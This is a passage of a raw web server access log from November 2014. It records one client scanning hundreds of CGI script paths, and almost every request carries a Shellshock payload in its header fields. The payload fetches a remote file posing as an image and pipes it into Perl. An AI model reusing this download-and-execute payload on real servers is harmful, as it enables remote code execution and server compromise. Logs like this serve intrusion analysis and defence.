perl" +66.172.64.17 - - [01/Nov/2014:20:03:36 +0200] "GET /download.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:37 +0200] "GET /details.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:37 +0200] "GET /debug.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:37 +0200] "GET /dcforum/dcforum.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:38 +0200] "GET /dcforum.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:38 +0200] "GET /dcboard.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:39 +0200] "GET /dcadmin.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:39 +0200] "GET /csPassword.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:39 +0200] "GET /CSNews.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:40 +0200] "GET /create_release.shHTTP/1.0" 404 223 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:40 +0200] "GET /cp/rac/nsManager.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:41 +0200] "GET /connector.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:41 +0200] "GET /cgistartHTTP/1.0" 404 214 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:41 +0200] "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:43 +0200] "GET /cgi-sys/realsignup.cgi HTTP/1.0" 404 460 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:43 +0200] "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:44 +0200] "GET /cgi-sys/randhtml.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:44 +0200] "GET /cgi-sys/mchat.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:44 +0200] "GET /cgi-sys/helpdesk.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:45 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:45 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:46 +0200] "GET /cgi-sys/entropybanner.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:46 +0200] "GET /cgi-sys/domainredirect.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:46 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:47 +0200] "GET /cgi-sys/addalink.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:47 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:48 +0200] "GET /cgi-bin/zml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:48 +0200] "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:49 +0200] "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:49 +0200] "GET /cgi-bin/wrap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:49 +0200] "GET /cgi-bin/wrapHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:50 +0200] "GET /cgi-bin/whois_raw.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:50 +0200] "GET /cgi-bin/whois/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:51 +0200] "GET /cgi-bin/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:51 +0200] "GET /cgi-bin/webspirs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:51 +0200] "GET /cgi-bin/webmap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:53 +0200] "GET /cgi-bin/webif.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:53 +0200] "GET /cgi-bin/webdist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:54 +0200] "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:54 +0200] "GET /cgi-bin/webbbs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:54 +0200] "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:55 +0200] "GET /cgi-bin/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:55 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:56 +0200] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:57 +0200] "GET /cgi-bin/vote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:58 +0200] "GET /cgi-bin/virgil.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:59 +0200] "GET /cgi-bin/viralator.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:00 +0200] "GET /cgi-bin/viewcvs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:01 +0200] "GET /cgi-bin/urlcount.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:02 +0200] "GET /cgi-bin/upload.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:04 +0200] "GET /cgi-bin/ttawebtop.cgi/HTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:03 +0200] "GET /cgi-bin/ultraboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:05 +0200] "GET /cgi-bin/troops.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:06 +0200] "GET /cgi-bin/traffic.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:07 +0200] "GET /cgi-bin/title.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:08 +0200] "GET /cgi-bin/tigvote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:10 +0200] "GET /cgi-bin/testing_whateverHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:09 +0200] "GET /cgi-bin/tidfinder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:11 +0200] "GET /cgi-bin/test2.plHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:13 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:12 +0200] "GET /cgi-bin/test/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:14 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:15 +0200] "GET /cgi-bin/technote/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:16 +0200] "GET /cgi-bin/talkback.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:17 +0200] "GET /cgi-bin/survey.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:18 +0200] "GET /cgi-bin/store/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:19 +0200] "GET /cgi-bin/store/agora.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:20 +0200] "GET /cgi-bin/store.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:21 +0200] "GET /cgi-bin/start.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:25 +0200] "GET /cgi-bin/snorkerz.cmdHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:23 +0200] "GET /cgi-bin/sojourn.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:26 +0200] "GET /cgi-bin/snorkerz.batHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:27 +0200] "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:28 +0200] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:29 +0200] "GET /cgi-bin/simplestmail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:30 +0200] "GET /cgi-bin/simplestguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:31 +0200] "GET /cgi-bin/showcheckins.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:33 +0200] "GET /cgi-bin/shopper.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:34 +0200] "GET /cgi-bin/shop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:35 +0200] "GET /cgi-bin/sendform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:36 +0200] "GET /cgi-bin/search/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:37 +0200] "GET /cgi-bin/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:38 +0200] "GET /cgi-bin/searchHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:40 +0200] "GET /cgi-bin/scoadminreg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:41 +0200] "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:41 +0200] "GET /cgi-bin/robpoll.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:43 +0200] "GET /cgi-bin/robadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:44 +0200] "GET /cgi-bin/responder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:44 +0200] "GET /cgi-bin/replicator/webpage.cgi/HTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:47 +0200] "GET /cgi-bin/ratlog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:46 +0200] "GET /cgi-bin/register.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:47 +0200] "GET /cgi-bin/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:49 +0200] "GET /cgi-bin/quizme.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:50 +0200] "GET /cgi-bin/quickstore.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:50 +0200] "GET /cgi-bin/publisher/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:53 +0200] "GET /cgi-bin/probecontrol.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:52 +0200] "GET /cgi-bin/profile.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:53 +0200] "GET /cgi-bin/printenvHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:04:55 +0200] "GET /cgi-bin/powerup/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:56 +0200] "GET /cgi-bin/postcards.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:56 +0200] "GET /cgi-bin/pollssi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:59 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:58 +0200] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:04:59 +0200] "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:01 +0200] "GET /cgi-bin/photo/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:02 +0200] "GET /cgi-bin/phf.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:04 +0200] "GET /cgi-bin/pfdispaly.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:02 +0200] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:05 +0200] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:05 +0200] "GET /cgi-bin/pbcgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:07 +0200] "GET /cgi-bin/pagelog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:08 +0200] "GET /cgi-bin/nph-test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:08 +0200] "GET /cgi-bin/nph-publish.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:10 +0200] "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:11 +0200] "GET /cgi-bin/nph-emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:11 +0200] "GET /cgi-bin/nlog-smb.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:14 +0200] "GET /cgi-bin/netpad.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:13 +0200] "GET /cgi-bin/newsdesk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { 